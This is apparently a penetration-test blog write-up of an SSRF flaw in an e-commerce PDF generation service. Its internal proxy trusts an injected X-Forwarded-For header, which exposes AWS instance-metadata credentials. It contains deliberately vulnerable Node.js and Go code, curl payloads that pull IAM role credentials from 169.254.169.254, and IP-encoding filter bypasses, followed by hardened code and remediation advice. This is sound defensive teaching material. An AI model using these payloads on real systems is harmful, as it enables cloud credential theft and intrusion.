    Got a similar war story? Or perhaps you're a junior pentester looking to sharpen your network hacking skills? Don't hesitate to reach out. You can book a 1:1 security mentorship session with me, Debasis Bhattacharjee, over at thedevdude.com. Let's talk shop and make the digital world a safer place, one misconfiguration at a time.

    ID: RTL-2026-002  ·  Network & Infrastructure  ·  Severity: HIGH  ·  2026-05-23
    RTL-2026-001 SSRF to Internal AWS Metadata Endpoint via Custom Header Injection in PDF Generation Service
    Cloud Security ⚠ Critical
    2026-05-23 18:45
    🎯 Target & Threat Context

    Our client, a rapidly scaling e-commerce powerhouse, tasked us with a comprehensive security audit of their new microservices architecture. Their platform handled millions of transactions daily, processing sensitive customer data, payment information, and intricate supply chain logistics. The stakes, as always, were sky-high. Compliance requirements (PCI DSS, GDPR, CCPA) meant any breach could lead to catastrophic financial penalties and irreparable reputational damage.

    The system under review was a complex ecosystem built predominantly on Node.js microservices, orchestrated via Kubernetes (EKS) within their AWS VPC. Data was stored in Aurora PostgreSQL, S3 buckets, and DynamoDB. The specific component that caught our eye was a seemingly benign PDF generation service. This service, let's call it pdf-gen-svc, was responsible for creating customer invoices, shipping labels, and custom reports. It was a standalone Node.js application running on an EC2 instance within a private subnet, using a headless Chrome instance (Puppeteer) to render HTML content into PDFs. The service exposed a REST API endpoint, /generate-pdf, which accepted a JSON payload containing a sourceUrl and an optional customHeaders object.

    The architectural design dictated that all outbound requests from internal services, including pdf-gen-svc, were routed through a centralized internal proxy. This proxy was intended to enforce network policies, perform logging, and cache frequently accessed external resources. The pdf-gen-svc would send a request to this internal proxy, which would then fetch the content from the specified sourceUrl and return it to pdf-gen-svc for rendering. The proxy itself was a custom-built Go application, running on a separate EC2 instance, and was designed to be highly performant.

    The client's AWS environment was fairly mature, but like many organizations, they had a mix of older and newer configurations. While some newer services were implementing stricter controls like IMDSv2, the pdf-gen-svc and its internal proxy had been deployed before these standards were universally enforced. This created a subtle but critical vulnerability window that we were about to pry wide open.

    🔓 Vulnerability & Attack Vector

    The core vulnerability here was a classic Server-Side Request Forgery (SSRF), but with a twist that made it particularly potent: the ability to inject arbitrary HTTP headers into the request made by the internal proxy. SSRF (OWASP Top 10 A10:2021) occurs when a web application fetches a remote resource without validating the user-supplied URL. This allows an attacker to coerce the application into making requests to arbitrary internal or external systems, bypassing firewall rules and accessing sensitive data.

    In this scenario, the pdf-gen-svc itself didn't directly make the request to the sourceUrl. Instead, it forwarded the sourceUrl and any customHeaders to an internal proxy. The proxy, in turn, was responsible for fetching the content. The critical flaw lay in the proxy's handling of specific HTTP headers, notably X-Forwarded-For. Many proxies use this header to record the original client's IP address. However, a common misconfiguration or oversight can lead to the proxy using the value of X-Forwarded-For not just for logging, but for *routing* or *identifying* the target host, especially in complex internal networks.

    Developers often miss this vulnerability for several reasons:

    1. Assumption of Trust: Internal services are frequently assumed to be trustworthy and secure, leading to less rigorous input validation for internal communication.
    2. Complex Interactions: In microservices architectures, the flow of data and requests can be convoluted. It's easy to lose track of where user-controlled input might end up being processed by different components.
    3. Proxy Misconfiguration: Proxies are powerful tools, but if not configured with extreme care, they can become a significant attack surface. Over-reliance on headers like X-Forwarded-For for internal routing without proper sanitization is a classic mistake.
    4. Focus on Functionality: The primary goal is often to make the PDF generation work reliably, not to anticipate how an attacker might manipulate internal proxy behavior.

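    This attack chain maps to MITRE ATT&CK T1190 (Exploit Public-Facing Application) for the initial access through the exposed /generate-pdf endpoint, and T1552.005 (Unsecured Credentials: Cloud Instance Metadata API) for the credential theft from the metadata service. The endpoint discovery that preceded it corresponds to T1595.002 (Active Scanning: Vulnerability Scanning).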

    Feature | Vulnerable Configuration | Hardened Configuration
    pdf-gen-svc Input Validation (URL) | Applies only a basic filter to sourceUrl; most internal addresses, and external hostnames that resolve to internal IPs, are not validated. | Strictly whitelists allowed domains/IPs for sourceUrl. Blocks all private IP ranges (RFC1918, 169.254.0.0/16, etc.).
    pdf-gen-svc Input Validation (Headers) | Allows arbitrary customHeaders to be passed directly to the internal proxy. | Sanitizes or strictly whitelists allowed customHeaders. Blocks sensitive headers like Host, X-Forwarded-For, X-Real-IP, etc., from user control.
    Internal Proxy Behavior | Uses X-Forwarded-For for routing decisions or trusts it implicitly for target IP identification. | Ignores X-Forwarded-For for routing. Only uses it for logging. Strictly routes based on the original request's target URL/host.
    AWS Instance Metadata Service (IMDS) | IMDSv1 enabled (no session token required). | IMDSv2 enforced (requires a session token, making SSRF significantly harder).
    Network Segmentation/Egress Filtering | pdf-gen-svc and internal proxy have broad egress rules, allowing connections to 169.254.169.254 and other internal IPs. | Strict egress rules (Security Groups, NACLs) prevent pdf-gen-svc and proxy from connecting to 169.254.169.254 or any unnecessary internal/external IPs.

    Let's imagine a simplified version of how the pdf-gen-svc might handle the request and pass it to the internal proxy, and how the proxy might process it.

    // pdf-gen-svc (Node.js)
    const express = require('express');
    const axios = require('axios'); // Or any HTTP client
    const app = express();
    app.use(express.json());
    
    const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch'; // Internal proxy endpoint
    
    app.post('/generate-pdf', async (req, res) => {
        const { sourceUrl, customHeaders } = req.body;
    
        // Basic URL filtering (e.g., blocks 169.254.x.x in sourceUrl)
        if (sourceUrl.includes('169.254')) {
            return res.status(400).send('Invalid source URL.');
        }
    
        try {
            // Forward request to internal proxy, including custom headers
            const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
                targetUrl: sourceUrl,
                headers: customHeaders || {} // Directly passes customHeaders
            });
    
            // ... rest of PDF generation logic ...
            res.status(200).send('PDF generated successfully (content omitted for brevity).');
    
        } catch (error) {
            console.error('Error during PDF generation:', error.message);
            res.status(500).send('Failed to generate PDF.');
        }
    });
    
    app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));
    

    And on the proxy side (conceptual Go code):

    // internal-proxy.corp (Go)
    package main
    
    import (
        "encoding/json"
        "fmt"
        "io"
        "log"
        "net/http"
    )
    
    func fetchHandler(w http.ResponseWriter, r *http.Request) {
        if r.Method != http.MethodPost {
            http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
            return
        }
    
        var requestBody struct {
            TargetURL string            `json:"targetUrl"`
            Headers   map[string]string `json:"headers"`
        }
    
        // Parse the JSON body sent by pdf-gen-svc
        if err := json.NewDecoder(r.Body).Decode(&requestBody); err != nil {
            http.Error(w, "Invalid JSON body", http.StatusBadRequest)
            return
        }
    
        // CRITICAL VULNERABILITY: Proxy trusts X-Forwarded-For for target IP
        targetURL := requestBody.TargetURL // Default
        if xff := requestBody.Headers["X-Forwarded-For"]; xff != "" {
            // If X-Forwarded-For is present, use it as the target host/IP.
            // This is a simplified example of a misconfiguration.
            // In reality, it might be used in conjunction with specific internal routing logic.
            targetURL = "http://" + xff // Direct IP injection!
        }
    
        req, err := http.NewRequest(http.MethodGet, targetURL, nil) // Sends request to the IP in X-Forwarded-For
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
            return
        }
    
        for k, v := range requestBody.Headers {
            req.Header.Set(k, v) // Pass all custom headers
        }
    
        client := &http.Client{}
        resp, err := client.Do(req)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
            return
        }
        defer resp.Body.Close()
    
        body, err := io.ReadAll(resp.Body)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
            return
        }
    
        // Relay the upstream status and body to pdf-gen-svc
        w.WriteHeader(resp.StatusCode)
        w.Write(body)
    }
    
    func main() {
        http.HandleFunc("/fetch", fetchHandler)
        log.Fatal(http.ListenAndServe(":8080", nil))
    }
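
Separately from the header injection, the substring check in the pdf-gen-svc sketch (`sourceUrl.includes('169.254')`) is weaker than it looks. The snippet below is an illustrative comparison, with function names invented for the example: the same metadata address can be written as a single decimal or hex integer, and the WHATWG URL parser built into Node.js normalizes both back to dotted-quad form. Whether a given downstream HTTP client accepts such notations depends on that client, so treat this as a reason to validate the parsed hostname rather than as a claim about the client's proxy.

```javascript
const METADATA_IP = '169.254.169.254';

// The substring check from the vulnerable sketch.
function naiveFilterAllows(sourceUrl) {
  return !sourceUrl.includes('169.254');
}

// Compare against the hostname after URL parsing, which canonicalizes
// decimal and hex IPv4 notations into dotted-quad form.
function parsedFilterAllows(sourceUrl) {
  let hostname;
  try {
    hostname = new URL(sourceUrl).hostname;
  } catch {
    return false; // unparseable input is rejected
  }
  return hostname !== METADATA_IP;
}

const candidates = [
  'http://169.254.169.254/latest/meta-data/',
  'http://2852039166/latest/meta-data/', // same address as one decimal integer
  'http://0xa9fea9fe/latest/meta-data/', // same address in hexadecimal
];

for (const url of candidates) {
  console.log(url, {
    naiveAllows: naiveFilterAllows(url),
    parsedAllows: parsedFilterAllows(url),
  });
}
```

Even the parsed comparison blocks only one address. An allowlist of expected hosts, as in the hardened configuration column above, is the sturdier design.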
    
    💥 Exploitation Walkthrough

    The attack began with reconnaissance. We identified the /generate-pdf endpoint and its expected JSON payload. Initial attempts to directly inject http://169.254.169.254/ into the sourceUrl were blocked by a basic URL filter that prevented direct internal IP access. This is where the "custom header injection" became the key.

    Our strategy was to leverage the customHeaders parameter to inject an X-Forwarded-For header pointing to the AWS EC2 metadata endpoint (169.254.169.254). Since the sourceUrl was filtered, we used an innocuous external URL that would be allowed, knowing the proxy would be tricked by our injected header.

    Step 1: Discovering IAM Role Names

    First, we needed the name of the IAM role attached to the instance making the request. Because the internal proxy, not pdf-gen-svc, issues the outbound call, the metadata service answers for the proxy's EC2 instance. The role name is listed at /latest/meta-data/iam/security-credentials/.

    curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" \
         -H "Content-Type: application/json" \
         -d '{
               "sourceUrl": "http://example.com/some-safe-content",
               "customHeaders": {
                 "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/"
               }
             }'
    

    The response (rendered in the PDF) contained the name of the role attached to the proxy's instance. The metadata service lists only the role from the instance profile of the instance that makes the request, and an instance profile holds a single role:

    
    internal-proxy-role
    

    Step 2: Retrieving Temporary IAM Credentials

    With the role name in hand, we could now request temporary security credentials for it. The name suggested it might carry broad network access.

    curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" \
         -H "Content-Type: application/json" \
         -d '{
               "sourceUrl": "http://example.com/another-safe-content",
               "customHeaders": {
                 "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/internal-proxy-role"
               }
             }'
    

    The PDF generated by the service now contained the following highly sensitive information:

    
    {
      "Code": "Success",
      "LastUpdated": "2023-10-27T10:00:00Z",
      "Type": "AWS-HMAC",
      "AccessKeyId": "ASIAV...EXAMPLE",
      "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCY...EXAMPLE",
      "Token": "IQoJb3JpZ2luX2VjELP...EXAMPLE",
      "Expiration": "2023-10-27T16:00:00Z"
    }
    

    Bingo! We had successfully retrieved temporary AWS credentials: an AccessKeyId, a SecretAccessKey, and a session Token. These credentials granted us the same permissions as the internal-proxy-role, which, upon further investigation, turned out to have extensive access to S3 buckets, internal DynamoDB tables, and even some Lambda functions. This amounted to a full compromise of everything that role could touch, giving us deep access into the client's AWS infrastructure.

    🛡 Defensive Hardening Blueprint

    Remediating this critical vulnerability requires a multi-layered approach, addressing both the immediate SSRF vector and strengthening the overall security posture.

    1. Strict Input Validation: Implement rigorous validation for all user-supplied URLs and headers.
    2. Network Segmentation & Egress Filtering: Restrict outbound network access for services to only what is absolutely necessary.
    3. Enforce IMDSv2: Mandate the use of IMDSv2 across all EC2 instances.
    4. Least Privilege IAM Roles: Ensure all IAM roles have the absolute minimum permissions required for their function.

    Fix | Pros | Cons
    Strict Input Validation (URL) | Directly prevents SSRF by blocking internal IPs and unapproved domains. Reduces attack surface significantly. | Requires careful maintenance of whitelists. Can break legitimate functionality if not thoroughly tested.
    Strict Input Validation (Headers) | Prevents header-based SSRF bypasses and other header injection attacks. | Can be complex to manage whitelists for all possible legitimate headers. May require changes to client applications.
    Network Segmentation & Egress Filtering | Provides a strong "last line of defense" even if application-level validation fails. Limits blast radius. | Requires careful configuration of Security Groups/NACLs. Can be complex in dynamic cloud environments.
    Enforce IMDSv2 | Significantly complicates SSRF attacks targeting metadata endpoints by requiring a session token. | Requires all EC2 instances and applications to be updated to use IMDSv2. Can cause compatibility issues with older applications.
    Least Privilege IAM Roles | Minimizes the impact of a successful compromise by limiting what an attacker can do with stolen credentials. | Requires careful auditing of existing roles and potentially refactoring permissions. Can be an ongoing effort.

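
For the least-privilege item, a first-pass audit can be as simple as flagging Allow statements that use wildcards. The sketch below is a rough illustration only: the function names, the sample policy, and the bucket name `invoice-templates` are hypothetical, and a real review would also need to consider conditions, NotAction, and permission boundaries.

```javascript
// IAM allows Action and Resource to be either a string or an array.
function toArray(value) {
  if (value === undefined) return [];
  return Array.isArray(value) ? value : [value];
}

// Flag Allow statements with wildcard actions ("*" or "service:*")
// or a wildcard resource ("*").
function findBroadStatements(policyDocument) {
  const findings = [];
  toArray(policyDocument.Statement).forEach((statement, index) => {
    if (statement.Effect !== 'Allow') return;
    const wildcardActions = toArray(statement.Action).filter(
      (action) => action === '*' || action.endsWith(':*')
    );
    const wildcardResource = toArray(statement.Resource).includes('*');
    if (wildcardActions.length > 0 || wildcardResource) {
      findings.push({ index, wildcardActions, wildcardResource });
    }
  });
  return findings;
}

// Hypothetical policy: statement 0 is overly broad, statement 1 is scoped.
const samplePolicy = {
  Version: '2012-10-17',
  Statement: [
    { Effect: 'Allow', Action: 's3:*', Resource: '*' },
    {
      Effect: 'Allow',
      Action: ['s3:GetObject'],
      Resource: 'arn:aws:s3:::invoice-templates/*',
    },
  ],
};

console.log(JSON.stringify(findBroadStatements(samplePolicy), null, 2));
```

A role like the proxy's, which only needs to fetch external content, would ideally produce no findings at all.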
    📖 Lessons From the Field

    Here's how the pdf-gen-svc and the internal proxy should be hardened:

    // pdf-gen-svc (Node.js) - Hardened
    const express = require('express');
    const axios = require('axios');
    const app = express();
    app.use(express.json());
    
    const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch';
    
    // Whitelist of hosts the service may fetch from (example values)
    const ALLOWED_HOSTS = new Set(['example.com', 'cdn.example.com']);
    
    // Header whitelist, lowercase because HTTP header names are case-insensitive
    const ALLOWED_HEADERS = new Set(['user-agent', 'referer']);
    
    // Accept only http(s) URLs whose hostname is on the whitelist.
    // IP literals (169.254.169.254, RFC 1918 addresses, etc.) are never on the
    // list, so they are rejected without a separate private-range check.
    function isValidUrl(url) {
        if (typeof url !== 'string') return false;
        try {
            const parsedUrl = new URL(url);
            if (parsedUrl.protocol !== 'http:' && parsedUrl.protocol !== 'https:') {
                return false;
            }
            // NOTE: this does not verify what the hostname resolves to. A whitelisted
            // domain that points at an internal IP must be caught by egress filtering
            // or by a resolved-address check in the component that connects.
            return ALLOWED_HOSTS.has(parsedUrl.hostname);
        } catch {
            return false;
        }
    }
    
    // Keep only whitelisted headers that carry string values
    function sanitizeHeaders(customHeaders) {
        const sanitized = {};
        if (customHeaders === null || typeof customHeaders !== 'object') return sanitized;
        for (const [name, value] of Object.entries(customHeaders)) {
            if (ALLOWED_HEADERS.has(name.toLowerCase()) && typeof value === 'string') {
                sanitized[name] = value;
            }
        }
        return sanitized;
    }
    
    app.post('/generate-pdf', async (req, res) => {
        const { sourceUrl, customHeaders } = req.body;
    
        if (!isValidUrl(sourceUrl)) {
            return res.status(400).send('Invalid or disallowed source URL.');
        }
    
        try {
            // Forward only the validated URL and the sanitized headers
            const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
                targetUrl: sourceUrl,
                headers: sanitizeHeaders(customHeaders)
            });
    
            // ... render proxyResponse.data into a PDF ...
            res.status(200).send('PDF generated successfully.');
        } catch (error) {
            console.error('Error during PDF generation:', error.message);
            res.status(500).send('Failed to generate PDF.');
        }
    });
    app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));
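
The hardened service above leaves one question open: what an allowed hostname actually resolves to. One way to approach it, sketched here under assumptions, is Node's built-in `net.BlockList` (available since Node 15) combined with `dns.promises.lookup`. The range list and the function names `isBlockedAddress` and `resolvesToBlockedAddress` are illustrative and not taken from the client's code.

```javascript
const net = require('net');
const dns = require('dns');

// Ranges a fetcher like pdf-gen-svc should never reach.
const blocked = new net.BlockList();
blocked.addSubnet('10.0.0.0', 8); // RFC 1918
blocked.addSubnet('172.16.0.0', 12); // RFC 1918
blocked.addSubnet('192.168.0.0', 16); // RFC 1918
blocked.addSubnet('127.0.0.0', 8); // loopback
blocked.addSubnet('169.254.0.0', 16); // link-local, includes the metadata service
blocked.addAddress('::1', 'ipv6'); // IPv6 loopback
blocked.addSubnet('fc00::', 7, 'ipv6'); // IPv6 unique local
blocked.addSubnet('fe80::', 10, 'ipv6'); // IPv6 link-local

// True when the address is internal, or is not an IP literal at all (fail closed).
function isBlockedAddress(address) {
  const family = net.isIP(address); // 4, 6, or 0 when not an IP
  if (family === 0) return true;
  return blocked.check(address, family === 6 ? 'ipv6' : 'ipv4');
}

// Resolve every A/AAAA record and reject the hostname if any of them is internal.
async function resolvesToBlockedAddress(hostname) {
  const records = await dns.promises.lookup(hostname, { all: true });
  return records.some((record) => isBlockedAddress(record.address));
}

console.log(isBlockedAddress('169.254.169.254'));
console.log(isBlockedAddress('8.8.8.8'));
```

A lookup at validation time can still differ from the address used when the connection is made, so this check narrows the gap but does not replace egress filtering.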
    

    And for the internal proxy (conceptual Go code - Hardened):

    // internal-proxy.corp (Go) - Hardened
    package main
    
    import (
        "encoding/json"
        "fmt"
        "io"
        "log"
        "net"
        "net/http"
        "net/url" // For parsing URLs
        "strings"
    )
    
    // isInternalIP reports whether ip is loopback, private (RFC 1918, fc00::/7),
    // link-local (169.254.0.0/16, fe80::/10), or unspecified.
    // net.IP.IsPrivate requires Go 1.17 or later.
    func isInternalIP(ip net.IP) bool {
        return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsUnspecified()
    }
    
    // Function to validate target URLs for the proxy
    func isValidProxyTargetUrl(targetURL string) bool {
        u, err := url.Parse(targetURL)
        if err != nil || (u.Scheme != "http" && u.Scheme != "https") {
            return false
        }
    
        host := u.Hostname()
        if host == "" {
            return false
        }
    
        // IP literals are checked directly.
        if ip := net.ParseIP(host); ip != nil {
            return !isInternalIP(ip)
        }
    
        // Hostnames must resolve exclusively to non-internal addresses.
        // NOTE: the later connection resolves the name again, so this alone does
        // not stop DNS rebinding; egress filtering remains the backstop.
        ips, err := net.LookupIP(host)
        if err != nil || len(ips) == 0 {
            return false
        }
        for _, ip := range ips {
            if isInternalIP(ip) {
                return false
            }
        }
        return true
    }
    
    func fetchHandler(w http.ResponseWriter, r *http.Request) {
        if r.Method != http.MethodPost {
            http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
            return
        }
    
        var requestBody struct {
            TargetURL string            `json:"targetUrl"`
            Headers   map[string]string `json:"headers"`
        }
    
        // Parse the JSON body sent by pdf-gen-svc
        if err := json.NewDecoder(r.Body).Decode(&requestBody); err != nil {
            http.Error(w, "Invalid JSON body", http.StatusBadRequest)
            return
        }
    
        if !isValidProxyTargetUrl(requestBody.TargetURL) {
            http.Error(w, "Invalid target URL for proxy", http.StatusBadRequest)
            return
        }
    
        // CRITICAL FIX: The proxy *must not* use X-Forwarded-For or similar headers for routing.
        // It should *always* use the `targetURL` provided directly for the actual network connection.
        req, err := http.NewRequest(http.MethodGet, requestBody.TargetURL, nil) // Always use TargetURL
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
            return
        }
    
        // Only set whitelisted headers if necessary, or pass none from user input.
        // The pdf-gen-svc should already have sanitized them; this is a second layer.
        for k, v := range requestBody.Headers {
            // Explicitly block sensitive headers from being set by user input on the proxy
            if strings.EqualFold(k, "Host") || strings.EqualFold(k, "X-Forwarded-For") || strings.EqualFold(k, "X-Real-IP") {
                continue // Do not allow these to be set by user
            }
            req.Header.Set(k, v)
        }
    
        client := &http.Client{}
        resp, err := client.Do(req)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
            return
        }
        defer resp.Body.Close()
    
        body, err := io.ReadAll(resp.Body)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
            return
        }
    
        w.WriteHeader(resp.StatusCode)
        w.Write(body)
    }
    
    func main() {
        http.HandleFunc("/fetch", fetchHandler)
        log.Fatal(http.ListenAndServe(":8080", nil))
    }
    

    This engagement was a stark reminder of several fundamental security principles that often get overlooked in the rush to build and deploy:

    • Never Trust User Input, Even for Headers: It's a mantra for URLs and body content, but developers often forget that HTTP headers, especially in a microservices context, can also be user-controlled and just as dangerous. Always validate and sanitize *all* input.
    • The "Innocuous" Services Are Often the Most Vulnerable: A PDF generation service might seem low-risk, but any service that makes outbound network requests is a potential SSRF vector. These are often overlooked because they aren't directly handling payment or authentication.
    • Network Segmentation is Your Last Stand: Even with perfect application-level validation, a misconfiguration or a new vulnerability can emerge. Robust egress filtering and network segmentation are crucial safety nets. If the pdf-gen-svc couldn't reach 169.254.169.254 at all, this attack would have been dead in the water.
    • AWS IMDSv2 is a Game-Changer for SSRF: If you're running EC2 instances, enforce IMDSv2. It's a powerful control that makes it significantly harder for attackers to exfiltrate temporary credentials via SSRF, requiring a multi-stage attack that many SSRF vectors simply can't achieve.
    • Proxies are Powerful, But Dangerous: Internal proxies, while useful for traffic management and security, introduce a new layer of complexity and potential vulnerabilities. Their configuration must be scrutinized with extreme care, especially regarding how they handle headers and route requests.
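
To make the IMDSv2 point concrete, here is a small sketch of the two-step flow it requires. The header names and the `/latest/api/token` path are the ones AWS documents for IMDSv2; the function names and the `primitive` object that models what an SSRF bug can send are assumptions made for illustration.

```javascript
const IMDS_BASE = 'http://169.254.169.254';

// Describe the two requests an IMDSv2 client has to make:
// a PUT to obtain a session token, then a GET that presents it.
function buildImdsV2Flow(path, ttlSeconds = 21600) {
  const tokenRequest = {
    method: 'PUT',
    url: `${IMDS_BASE}/latest/api/token`,
    headers: { 'X-aws-ec2-metadata-token-ttl-seconds': String(ttlSeconds) },
  };
  const dataRequest = (token) => ({
    method: 'GET',
    url: `${IMDS_BASE}${path}`,
    headers: { 'X-aws-ec2-metadata-token': token },
  });
  return { tokenRequest, dataRequest };
}

// Hypothetical model of an SSRF primitive: can it issue this request's method?
function canReplay(request, primitive) {
  return primitive.methods.includes(request.method);
}

const flow = buildImdsV2Flow('/latest/meta-data/iam/security-credentials/');
const getOnlyProxy = { methods: ['GET'] }; // the proxy sketched earlier only issues GET

console.log('token step reachable:', canReplay(flow.tokenRequest, getOnlyProxy));
console.log('data step reachable:', canReplay(flow.dataRequest('example-token'), getOnlyProxy));
```

Even though the attacker here controlled request headers, a GET-only fetcher cannot complete the PUT that issues the token, which is why enforcing IMDSv2 would have broken this particular chain.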

    Security isn't just about finding the big, flashy exploits. It's about understanding the subtle interactions, the forgotten configurations, and the common assumptions that create these critical vulnerabilities. Keep your eyes sharp, your validation strict, and your network boundaries tight.

    Got a challenging security problem or want to sharpen your pentesting skills? Don't hesitate to reach out! You can book a 1:1 security mentorship session with me, Debasis Bhattacharjee, at thedevdude.com. Let's talk shop and make the digital world a safer place, one system at a time.

    ID: RTL-2026-001  ·  Web Application Pentesting  ·  Severity: CRITICAL  ·  2026-05-23